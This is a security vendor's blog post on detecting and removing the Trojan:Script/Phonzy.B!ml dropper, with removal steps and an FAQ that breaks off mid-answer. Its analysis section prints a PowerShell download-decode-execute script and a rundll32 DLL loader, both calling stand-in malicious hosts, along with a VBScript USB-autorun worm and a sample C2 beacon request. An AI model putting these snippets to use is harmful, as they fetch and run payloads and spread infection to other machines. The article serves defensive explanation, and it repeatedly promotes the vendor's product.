{"id":19960,"date":"2024-02-27T08:45:57","date_gmt":"2024-02-27T08:45:57","guid":{"rendered":"https:\/\/gridinsoft.com\/blogs\/?p=19960"},"modified":"2025-04-09T22:48:22","modified_gmt":"2025-04-09T22:48:22","slug":"trojanscript-phonzy-removal-guide","status":"publish","type":"post","link":"https:\/\/gridinsoft.com\/blogs\/trojanscript-phonzy-removal-guide\/","title":{"rendered":"How to Remove Trojan:Script\/Phonzy.B!ml Malware"},"content":{"rendered":"\r\n<p><strong>Trojan:Script\/Phonzy.B!ml<\/strong> is a generic detection name used by Microsoft Defender for a dangerous loader malware. This threat primarily functions as a dropper, downloading and executing additional malicious payloads onto infected systems. In numerous documented infection cases, Phonzy trojan has been observed delivering banking trojans designed to steal financial credentials.<\/p>\r\n\r\n\r\n\r\n<div itemscope itemtype=\"https:\/\/schema.org\/TechArticle\">\r\n  <meta itemprop=\"headline\" content=\"Trojan:Script\/Phonzy.B!ml Removal Guide\" \/>\r\n  <meta itemprop=\"description\" content=\"Comprehensive guide on how to detect and remove Trojan:Script\/Phonzy.B!ml malware, a dangerous dropper that delivers banking trojans and other malicious payloads.\" \/>\r\n  <meta itemprop=\"keywords\" content=\"Trojan:Script\/Phonzy.B!ml, malware removal, dropper trojan, Microsoft Defender detection, banking trojans\" \/>\r\n<\/div>\r\n\r\n\r\n\r\n<table class=\"malware-info-table\">\r\n  <tr>\r\n    <th>Attribute<\/th>\r\n    <th>Details<\/th>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Threat Name<\/td>\r\n    <td>Trojan:Script\/Phonzy.B!ml<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Type<\/td>\r\n    <td>Dropper, Loader, Trojan<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Detection Method<\/td>\r\n    <td>Machine Learning (ML) by Microsoft Defender<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Primary Functions<\/td>\r\n    <td>Downloading additional malware, system reconnaissance, data theft<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    
<td>Propagation<\/td>\r\n    <td>Phishing emails, malicious websites, cracked software, USB drives<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Risks<\/td>\r\n    <td>Banking trojan infection, credential theft, complete system compromise<\/td>\r\n  <\/tr>\r\n  <tr>\r\n    <td>Removal Difficulty<\/td>\r\n    <td>Moderate to High (anti-malware tool recommended)<\/td>\r\n  <\/tr>\r\n<\/table>\r\n\r\n\r\n\r\n<h2 class=\"wp-block-heading\">Trojan:Script\/Phonzy.B!ml Overview<\/h2>\r\n\r\n\r\n\r\n<p>Trojan:Script\/Phonzy.B!ml is <a href=\"https:\/\/answers.microsoft.com\/en-us\/windows\/forum\/all\/windows-defender-detected-trojanwin32phonzyaml\/299db484-8073-4e35-b32f-a16fd3060e34\" rel=\"noopener noreferrer nofollow\" target=\"_blank\">a generic detection name<\/a> that Microsoft Windows Defender uses to identify a family of similar malware threats. While these malicious programs may share behavioral patterns and code characteristics, they often belong to different malware families, making complete identification challenging through automated detection alone.<\/p>\r\n\r\n\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-bml-defender.webp\" alt=\"Microsoft Defender alert showing Trojan:Script\/Phonzy.B!ml detection with severe threat level\" width=\"579\" height=\"749\" class=\"aligncenter size-full wp-image-20045\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-bml-defender.webp 579w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-bml-defender-232x300.webp 232w\" sizes=\"auto, (max-width: 579px) 100vw, 579px\" \/>\r\n\r\n\r\n\r\n<p>Functionally, Phonzy.B!ml <a href=\"https:\/\/gridinsoft.com\/dropper\">operates as a scripted dropper malware<\/a>. Its primary purpose is <strong>to download and execute additional malicious payloads<\/strong> without requiring user interaction. 
Beyond this core function, Phonzy samples are designed to collect <strong>extensive information about the infected system<\/strong>, including geographical location, operating system details, installed applications, and hardware specifications. The typical payload delivered in Phonzy malware attacks <a href=\"https:\/\/gridinsoft.com\/blogs\/qakbot-is-back\/\">consists of sophisticated banking trojans<\/a> \u2013 specialized credential stealers that target online banking information, financial credentials, and digital payment data.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Is Phonzy B!ml a False Positive?<\/h3>\r\n\r\n\r\n\r\n<p>Looking deeper at Microsoft&#8217;s detection naming conventions reveals that <strong>the &#8220;!ml&#8221; suffix stands for &#8220;machine learning&#8221;<\/strong>, indicating that the threat was identified by Microsoft&#8217;s artificial intelligence detection engine. While highly effective, machine learning detection sometimes requires confirmation through traditional signature-based systems. Without this secondary verification, the possibility of <strong>false positive detections increases significantly<\/strong>.<\/p>\r\n\r\n\r\n\r\n<p>Unfortunately, reliably distinguishing between legitimate false positives and actual Phonzy infections can be challenging. Modern malware employs sophisticated obfuscation techniques to blend seamlessly with legitimate system files, making file location alone insufficient for identification. For this reason, <strong>we strongly recommend scanning your system with GridinSoft Anti-Malware<\/strong> to obtain a definitive analysis and ensure complete removal of any threats.<\/p>\r\n\r\n\r\n\r\n<h2 class=\"wp-block-heading\">Phonzy.B!ml Technical Analysis<\/h2>\r\n\r\n\r\n\r\n<p>Since Phonzy is a generic detection name covering multiple malware variants, identifying a single representative sample for analysis presents challenges. 
To provide a comprehensive understanding of this threat, we&#8217;ve analyzed several specimens to document the full range of capabilities. In summary, while Phonzy appears to be a relatively simple dropper on the surface, it can cause extensive damage to infected systems through the secondary malware it deploys.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Infection Vector and Launch Mechanism<\/h3>\r\n\r\n\r\n\r\n<p>The majority of Phonzy samples we&#8217;ve encountered arrive <strong>in an obfuscated, packed form<\/strong> \u2013 typically encrypted and\/or archived. This packaging serves two primary purposes: evading static detection mechanisms and complicating forensic analysis. In the case of Phonzy variants, evading detection appears to be the primary motivation.<\/p>\r\n\r\n\r\n\r\n<figure id=\"attachment_19989\" aria-describedby=\"caption-attachment-19989\" style=\"width: 790px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-unpacking.webp\" alt=\"Malware unpacking process showing obfuscated script execution and payload extraction\" width=\"790\" height=\"470\" class=\"size-full wp-image-19989\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-unpacking.webp 790w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-unpacking-300x178.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/phonzy-unpacking-768x457.webp 768w\" sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><figcaption id=\"caption-attachment-19989\" class=\"wp-caption-text\">Process monitoring showing Phonzy malware unpacking and launching payload<\/figcaption><\/figure>\r\n\r\n\r\n\r\n<p>To execute the unpacking process, Phonzy relies on the initial script that downloads the malware to the target system. 
This is typically a PowerShell script that retrieves the dropper from an intermediary command and control (C2) server. Below is an example of a typical obfuscated PowerShell script used in Phonzy distribution:<\/p>\r\n\r\n\r\n<pre class=\"brush: powershell; title: ; notranslate\" title=\"\">\r\n$e3Df = &#x5B;System.IO.Path]::GetTempPath();\r\n$k9jL = &quot;$e3Df\\t8R4.exe&quot;;\r\n$w32c = New-Object System.Net.WebClient;\r\n$w32c.Headers.Add(&quot;User-Agent&quot;, &quot;Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36&quot;);\r\ntry {\r\n    $w32c.DownloadFile(&quot;hxxp:\/\/malicious-server.com\/payload.bin&quot;, $k9jL);\r\n    $b9Te = &#x5B;System.IO.File]::ReadAllBytes($k9jL);\r\n    for($i=0; $i -lt $b9Te.length; $i++) {\r\n        $b9Te&#x5B;$i] = $b9Te&#x5B;$i] -bxor 0x43;\r\n    }\r\n    &#x5B;System.IO.File]::WriteAllBytes($k9jL, $b9Te);\r\n    Start-Process $k9jL;\r\n} catch {\r\n    Remove-Item $k9jL -ErrorAction SilentlyContinue;\r\n}\r\n<\/pre>\r\n\r\n\r\n<p>The script above demonstrates how Phonzy is downloaded, decrypted with a simple XOR operation, and then executed on the target system. In a real attack, this script would be significantly more obfuscated to avoid detection.<\/p>\r\n\r\n\r\n\r\n<p>We recently documented a sophisticated campaign that bypasses traditional infection steps by tricking users into running malicious PowerShell scripts directly. <a href=\"https:\/\/gridinsoft.com\/blogs\/fake-captcha-sites-malicious-code-lumma-stealer\/\">While that campaign delivered Lumma Stealer<\/a>, the same infrastructure and techniques could easily be adapted to distribute Phonzy variants or any other malware family.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">System Reconnaissance<\/h3>\r\n\r\n\r\n\r\n<p>Once successfully executed, Trojan:Script\/Phonzy.B!ml begins collecting <strong>comprehensive information about the compromised system<\/strong>. 
This reconnaissance phase typically includes gathering details about:<\/p>\r\n\r\n\r\n\r\n<ul class=\"wp-block-list\"><li>Operating system version and architecture<\/li><li>Hardware specifications (CPU, RAM, disk space)<\/li><li>Installed applications and security software<\/li><li>Connected devices and peripherals<\/li><li>Geographic location based on IP address<\/li><li>User account information and privileges<\/li><li>Browser data and saved credentials<\/li><\/ul>\r\n\r\n\r\n\r\n<p>This information is used to create a unique fingerprint of the infected system, allowing attackers to track individual infections and potentially tailor subsequent payloads accordingly. Some advanced Phonzy.B!ml variants also include functionality <strong>to capture screenshots<\/strong> of the victim&#8217;s desktop, providing attackers with visual information about the compromised environment.<\/p>\r\n\r\n\r\n\r\n<figure id=\"attachment_19993\" aria-describedby=\"caption-attachment-19993\" style=\"width: 671px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/sysinfo-log.webp\" alt=\"Text log showing system information collected by Phonzy malware including OS version, hardware details, and installed software\" width=\"671\" height=\"426\" class=\"size-full wp-image-19993\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/sysinfo-log.webp 671w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/02\/sysinfo-log-300x190.webp 300w\" sizes=\"auto, (max-width: 671px) 100vw, 671px\" \/><figcaption id=\"caption-attachment-19993\" class=\"wp-caption-text\">System information log collected by a Phonzy sample during reconnaissance phase<\/figcaption><\/figure>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Command and Control Communication<\/h3>\r\n\r\n\r\n\r\n<p>Following the reconnaissance phase, Phonzy establishes communication with its 
command and control infrastructure. The malware <strong>sends an HTTP POST request to the C2 server<\/strong>, notifying the attackers of the new infection and transmitting the collected system information. Depending on the response received from the server, the malware may:<\/p>\r\n\r\n\r\n\r\n<ul class=\"wp-block-list\"><li>Remain dormant to avoid detection<\/li><li>Download additional malware payloads<\/li><li>Execute specific commands on the infected system<\/li><li>Uninstall itself if the target is deemed unsuitable<\/li><\/ul>\r\n\r\n\r\n\r\n<p>While the C2 communication protocols employed by Phonzy variants are relatively simplistic, they are designed to blend in with normal web traffic to avoid detection by network monitoring solutions. Below is an example of a typical HTTP request pattern used by Phonzy:<\/p>\r\n\r\n\r\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nPOST \/gate.php HTTP\/1.1\r\nHost: malicious-server.com\r\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\r\nContent-Type: application\/x-www-form-urlencoded\r\nContent-Length: 2048\r\n\r\nid=MACHINE_ID&amp;os=Windows+10+Pro&amp;arch=x64&amp;av=Windows+Defender&amp;installed=Chrome,Office,Adobe&amp;admin=true&amp;version=1.2\r\n<\/pre>\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Secondary Payload Delivery<\/h3>\r\n\r\n\r\n\r\n<p>The primary function of Phonzy Trojan is downloading and executing secondary malware payloads. 
Upon receiving instructions from the C2 server, Phonzy will download additional malware from specified URLs, typically compromised websites used as intermediary distribution points to obscure the actual source of the malicious code.<\/p>\r\n\r\n\r\n\r\n<p>For executing secondary payloads, Phonzy employs several techniques depending on the payload type:<\/p>\r\n\r\n\r\n\r\n<ul class=\"wp-block-list\"><li><strong>Executable Files (.exe):<\/strong> Direct execution through process creation<\/li><li><strong>Dynamic Link Libraries (.dll):<\/strong> Loaded through DLL hijacking or injection into legitimate processes<\/li><li><strong>Script Files (.ps1, .vbs, .js):<\/strong> Executed through appropriate scripting engines<\/li><li><strong>Document Files (.doc, .xls):<\/strong> Opened with legitimate applications to trigger embedded macros<\/li><\/ul>\r\n\r\n\r\n\r\n<p>The following PowerShell code demonstrates how Phonzy might execute a downloaded DLL payload through rundll32:<\/p>\r\n\r\n\r\n<pre class=\"brush: powershell; title: ; notranslate\" title=\"\">\r\n# Function to download and execute DLL payload\r\nfunction Invoke-DllPayload {\r\n    param(\r\n        &#x5B;string]$PayloadUrl,\r\n        &#x5B;string]$EntryPoint\r\n    )\r\n    \r\n    $TempPath = &#x5B;System.IO.Path]::GetTempPath()\r\n    $PayloadPath = Join-Path $TempPath (&#x5B;System.Guid]::NewGuid().ToString() + &quot;.dll&quot;)\r\n    \r\n    try {\r\n        # Download the DLL\r\n        (New-Object System.Net.WebClient).DownloadFile($PayloadUrl, $PayloadPath)\r\n        \r\n        # Execute the DLL using rundll32\r\n        $Command = &quot;rundll32.exe $PayloadPath,$EntryPoint&quot;\r\n        Start-Process -FilePath &quot;cmd.exe&quot; -ArgumentList &quot;\/c $Command&quot; -WindowStyle Hidden\r\n        \r\n        return $true\r\n    }\r\n    catch {\r\n        return $false\r\n    }\r\n}\r\n\r\n# Call the function with parameters from C2 server\r\nInvoke-DllPayload -PayloadUrl 
&quot;hxxp:\/\/compromised-site.com\/payload.dll&quot; -EntryPoint &quot;DllMain&quot;\r\n<\/pre>\r\n\r\n\r\n<h3 class=\"wp-block-heading\">USB Drive Propagation<\/h3>\r\n\r\n\r\n\r\n<p>Some advanced variants of Phonzy.B!ml include self-propagation capabilities, allowing the malware to spread via attached USB drives and other removable storage media. This worm-like behavior is relatively uncommon in modern malware, as security vendors have developed robust detection methods for such propagation techniques. However, this approach remains effective in certain environments, particularly those with limited security measures or air-gapped networks.<\/p>\r\n\r\n\r\n\r\n<p>The USB infection mechanism typically works by:<\/p>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Monitoring for newly connected USB storage devices<\/li><li>Creating hidden folders on the device to store malware payloads<\/li><li>Modifying or creating autorun.inf files to trigger execution when connected to a new system<\/li><li>Converting legitimate executables on the drive into infected versions<\/li><li>Creating shortcut files that execute malware while opening legitimate content<\/li><\/ol>\r\n\r\n\r\n\r\n<p>The following is a simplified example of code that might be used by Phonzy to monitor for and infect USB drives:<\/p>\r\n\r\n\r\n<pre class=\"brush: vb; title: ; notranslate\" title=\"\">\r\n&#039; VBScript example of USB drive infection mechanism\r\nOption Explicit\r\n\r\nDim fso, wsh, drives, drive\r\nSet fso = CreateObject(&quot;Scripting.FileSystemObject&quot;)\r\nSet wsh = CreateObject(&quot;WScript.Shell&quot;)\r\n\r\n&#039; Monitor for new drives\r\nSub MonitorDrives()\r\n    On Error Resume Next\r\n    \r\n    &#039; Get current drives\r\n    Set drives = fso.Drives\r\n    \r\n    &#039; Check each drive\r\n    For Each drive in drives\r\n        &#039; Look for removable drives\r\n        If drive.DriveType = 1 And drive.IsReady Then\r\n            InfectDrive drive.Path\r\n        
End If\r\n    Next\r\n    \r\n    &#039; Continue monitoring\r\n    WScript.Sleep 5000\r\n    MonitorDrives\r\nEnd Sub\r\n\r\n&#039; Infect a specific drive\r\nSub InfectDrive(drivePath)\r\n    On Error Resume Next\r\n    \r\n    &#039; Create hidden folder\r\n    fso.CreateFolder drivePath &amp; &quot;\\System Volume Information&quot;\r\n    wsh.Run &quot;attrib +h +s &quot;&quot;&quot; &amp; drivePath &amp; &quot;\\System Volume Information&quot;&quot;&quot;, 0, True\r\n    \r\n    &#039; Copy malware payload\r\n    fso.CopyFile WScript.ScriptFullName, drivePath &amp; &quot;\\System Volume Information\\svchost.exe&quot;\r\n    \r\n    &#039; Create autorun.inf\r\n    Dim autorun\r\n    Set autorun = fso.CreateTextFile(drivePath &amp; &quot;\\autorun.inf&quot;, True)\r\n    autorun.WriteLine &quot;&#x5B;AutoRun]&quot;\r\n    autorun.WriteLine &quot;open=System Volume Information\\svchost.exe&quot;\r\n    autorun.WriteLine &quot;action=Open files on this drive&quot;\r\n    autorun.Close\r\n    \r\n    &#039; Hide autorun.inf\r\n    wsh.Run &quot;attrib +h +s &quot;&quot;&quot; &amp; drivePath &amp; &quot;\\autorun.inf&quot;&quot;&quot;, 0, True\r\n    \r\n    &#039; Create shortcuts to legitimate files\r\n    CreateMaliciousShortcuts drivePath\r\nEnd Sub\r\n\r\n&#039; Create malicious shortcuts to existing files\r\nSub CreateMaliciousShortcuts(drivePath)\r\n    &#039; Implementation details omitted for brevity\r\nEnd Sub\r\n\r\n&#039; Start monitoring\r\nMonitorDrives\r\n<\/pre>\r\n\r\n\r\n<h2 class=\"wp-block-heading\">How To Remove Trojan:Script\/Phonzy.B!ml<\/h2>\r\n\r\n\r\n\r\n<p>Removing Phonzy B!ml malware requires a thorough approach due to its ability to download multiple malicious payloads and establish persistence mechanisms. 
We strongly recommend using GridinSoft Anti-Malware, which is specifically designed to detect and eliminate complex malware threats including all components and payloads associated with Phonzy infections.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Automated Removal with GridinSoft Anti-Malware<\/h3>\r\n\r\n\r\n\r\n<p>Follow these steps to completely remove Trojan:Script\/Phonzy.B!ml and any associated malware from your system:<\/p>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 1: Download and Install GridinSoft Anti-Malware<\/h4>\r\n\r\n\r\n\r\n<p>Download GridinSoft Anti-Malware using the button below. Before starting the installation, disconnect from the internet and close all browser windows to prevent any potential interference from active malware.<\/p>\r\n\r\n\r\n\r\n<div class=\"wp-block-buttons is-layout-flex wp-block-buttons-is-layout-flex\">\r\n\r\n<div class=\"wp-block-button aligncenter\"><a class=\"wp-block-button__link\" href=\"https:\/\/gridinsoft.com\/download\/antimalware\">Download GridinSoft Anti-Malware<\/a><\/div>\r\n\r\n<\/div>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 2: Run a Full System Scan<\/h4>\r\n\r\n\r\n\r\n<p>Launch GridinSoft Anti-Malware and select the &#8220;Full Scan&#8221; option to conduct a comprehensive examination of your entire system. 
This will detect Phonzy.B!ml and any other malware that may have been downloaded as secondary payloads.<\/p>\r\n\r\n\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp\" alt=\"GridinSoft Anti-Malware scan interface showing scan options and progress\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22665\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-main-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 3: Remove All Detected Threats<\/h4>\r\n\r\n\r\n\r\n<p>After the scan completes, review the list of detected threats. Select all items and click &#8220;Clean Now&#8221; to remove Phonzy.B!ml and all associated malware components from your system.<\/p>\r\n\r\n\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp\" alt=\"GridinSoft Anti-Malware detection results showing Phonzy malware components with Clean Now button\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22666\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-result-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 4: Reset Your Browsers<\/h4>\r\n\r\n\r\n\r\n<p>Since banking trojans commonly delivered by Phonzy target browser data, 
it&#8217;s essential to reset all installed browsers to remove any malicious extensions, hijacked settings, or injected code:<\/p>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>In GridinSoft Anti-Malware, navigate to the &#8220;Tools&#8221; tab<\/li><li>Select &#8220;Reset Browser Settings&#8221;<\/li><li>Choose all browsers installed on your system<\/li><li>Click &#8220;Reset&#8221; to restore browsers to their default state<\/li><\/ol>\r\n\r\n\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2022\/07\/am-reset-browser.png\" alt=\"GridinSoft Anti-Malware browser reset tool interface showing browser selection options\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-18654\" title=\"\">\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 5: Scan Removable Devices<\/h4>\r\n\r\n\r\n\r\n<p>Since some Phonzy variants can spread via USB drives, scan all removable storage devices that have been connected to your computer:<\/p>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Connect each USB drive or external storage device one at a time<\/li><li>In GridinSoft Anti-Malware, select &#8220;Custom Scan&#8221;<\/li><li>Choose the connected removable drive<\/li><li>Complete a full scan and remove any detected threats<\/li><\/ol>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 6: Enable Proactive Protection<\/h4>\r\n\r\n\r\n\r\n<p>To prevent future infections, enable GridinSoft Anti-Malware&#8217;s proactive protection features:<\/p>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Navigate to the &#8220;Protect&#8221; tab<\/li><li>Enable &#8220;Real-Time Protection&#8221; to guard against future threats<\/li><li>Enable &#8220;Removable Device Protection&#8221; to prevent USB-based infections<\/li><li>Click &#8220;Apply&#8221; to save your protection settings<\/li><\/ol>\r\n\r\n\r\n\r\n<img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" 
src=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp\" alt=\"GridinSoft Anti-Malware protection settings panel showing security options enabled\" width=\"886\" height=\"689\" class=\"aligncenter size-full wp-image-22667\" title=\"\" srcset=\"https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean.webp 886w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-300x233.webp 300w, https:\/\/gridinsoft.com\/blogs\/wp-content\/uploads\/2024\/06\/antimalware-clean-768x597.webp 768w\" sizes=\"auto, (max-width: 886px) 100vw, 886px\" \/>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Manual Removal Instructions for Advanced Users<\/h3>\r\n\r\n\r\n\r\n<p>While automated removal is strongly recommended, technically proficient users may attempt manual removal. Be aware that this approach requires advanced system knowledge and carries risks if performed incorrectly.<\/p>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 1: Boot into Safe Mode<\/h4>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Press Win + R, type &#8220;msconfig&#8221; and press Enter<\/li><li>Go to the &#8220;Boot&#8221; tab<\/li><li>Check &#8220;Safe boot&#8221; and select &#8220;Minimal&#8221;<\/li><li>Click &#8220;Apply&#8221; and &#8220;OK&#8221;<\/li><li>Restart your computer when prompted<\/li><\/ol>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 2: Stop Malicious Processes<\/h4>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Press Ctrl + Shift + Esc to open Task Manager<\/li><li>Look for suspicious processes (random names, system locations, high resource usage)<\/li><li>Right-click suspicious processes and select &#8220;End Task&#8221;<\/li><li>For persistent processes, note their location for later removal<\/li><\/ol>\r\n\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 3: Remove Malicious Files<\/h4>\r\n\r\n\r\n\r\n<p>Common Phonzy file locations include:<\/p>\r\n\r\n\r\n<pre class=\"brush: plain; title: 
; notranslate\" title=\"\">\r\nC:\\Users\\&#x5B;Username]\\AppData\\Roaming\\&#x5B;random name].exe\r\nC:\\Users\\&#x5B;Username]\\AppData\\Local\\Temp\\&#x5B;random name].exe\r\nC:\\Windows\\Temp\\&#x5B;random name].dll\r\nC:\\ProgramData\\&#x5B;random name]\\&#x5B;random name].exe\r\n<\/pre>\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 4: Remove Registry Entries<\/h4>\r\n\r\n\r\n\r\n<p>Press Win + R, type &#8220;regedit&#8221; and press Enter. Look for and delete these registry entries:<\/p>\r\n\r\n\r\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\&#x5B;random name]\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\&#x5B;random name]\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run\\&#x5B;random name]\r\n<\/pre>\r\n\r\n\r\n<h4 class=\"wp-block-heading\">Step 5: Disable Malicious Scheduled Tasks<\/h4>\r\n\r\n\r\n\r\n<ol class=\"wp-block-list\"><li>Press Win + R, type &#8220;taskschd.msc&#8221; and press Enter<\/li><li>Look for tasks with random names or suspicious actions<\/li><li>Right-click suspicious tasks and select &#8220;Delete&#8221;<\/li><\/ol>\r\n\r\n\r\n\r\n<h2 class=\"wp-block-heading\">Prevention Recommendations<\/h2>\r\n\r\n\r\n\r\n<p>To protect your system from Trojan:Script\/Phonzy.B!ml and similar threats, implement these security best practices:<\/p>\r\n\r\n\r\n\r\n<ul class=\"wp-block-list\"><li><strong>Avoid pirated software and unauthorized downloads<\/strong> &#8211; Cracked software is frequently used to distribute malware like Phonzy<\/li><li><strong>Be cautious with email attachments<\/strong> &#8211; Never open attachments from unknown senders or unexpected messages<\/li><li><strong>Keep systems and software updated<\/strong> &#8211; Install security updates promptly to patch vulnerabilities<\/li><li><strong>Use advanced security software<\/strong> &#8211; GridinSoft 
Anti-Malware provides proactive protection against emerging threats<\/li><li><strong>Enable USB drive protection<\/strong> &#8211; Utilize security features that scan removable media before accessing its contents<\/li><li><strong>Be wary of fake download sites<\/strong> &#8211; Verify website legitimacy before downloading any software<\/li><li><strong>Implement regular backups<\/strong> &#8211; Maintain current backups of important data to minimize impact of potential infections<\/li><\/ul>\r\n\r\n\r\n\r\n<p>GridinSoft Anti-Malware&#8217;s Removable Device Protection feature is particularly effective at blocking attempts by Phonzy and other malware to infect systems via USB drives, providing an essential layer of protection against this specific infection vector.<\/p>\r\n\r\n\r\n\r\n<h2 class=\"wp-block-heading\">Frequently Asked Questions<\/h2>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">How does Trojan:Script\/Phonzy.B!ml infect systems?<\/h3>\r\n\r\n\r\n\r\n<p>Trojan:Script\/Phonzy.B!ml typically infects systems through several methods, including phishing emails with malicious attachments, drive-by downloads from compromised websites, bundled software installations (especially cracked or pirated software), and infected USB drives. The initial infection usually involves a PowerShell or other script that downloads and executes the main Phonzy payload, which then contacts its command and control server for further instructions and additional malware downloads.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">What damage can Phonzy.B!ml cause to my computer?<\/h3>\r\n\r\n\r\n\r\n<p>While Phonzy.B!ml itself primarily functions as a dropper, the secondary payloads it delivers can cause extensive damage. Banking trojans commonly delivered by Phonzy can steal financial credentials, leading to unauthorized transactions and identity theft. 
Other potential payloads include ransomware that encrypts your files, cryptominers that consume system resources, and backdoors that provide attackers with persistent access to your system. Additionally, the system reconnaissance performed by Phonzy compromises your privacy by collecting and transmitting sensitive information about your computer and browsing habits.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Why does Microsoft Defender label this threat with &#8216;!ml&#8217; in its name?<\/h3>\r\n\r\n\r\n\r\n<p>The &#8216;!ml&#8217; suffix in Microsoft Defender detection names indicates that the threat was identified using machine learning algorithms rather than traditional signature-based detection. This approach allows Microsoft to detect previously unseen malware variants based on behavioral similarities to known threats. While machine learning detection provides excellent protection against emerging threats, it occasionally results in false positives. When you see the &#8216;!ml&#8217; designation, it&#8217;s advisable to verify the detection using a specialized anti-malware tool like GridinSoft Anti-Malware, which employs multiple detection techniques to provide more definitive results.<\/p>\r\n\r\n\r\n\r\n<h3 class=\"wp-block-heading\">Can Phonzy.B!ml steal my banking credentials?<\/h3>\r\n\r\n\r\n\r\n<p>Phonzy.B!ml itself doesn&#8217;t directly steal banking credentials, but it frequently downloads and installs banking trojans specifically designed for this purpose. These secondary payloads employ various techniques to capture financial information, including keylogging (recording keystrokes), form grabbing (capturing data entered into web forms), screen capturing during banking sessions, and web injection (inserting malicious code into banking websites to harvest credentials). 
